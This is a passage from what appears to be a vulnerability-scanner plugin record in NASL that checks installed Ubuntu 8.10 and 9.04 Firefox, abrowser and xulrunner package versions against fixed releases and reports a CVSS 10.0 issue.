ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}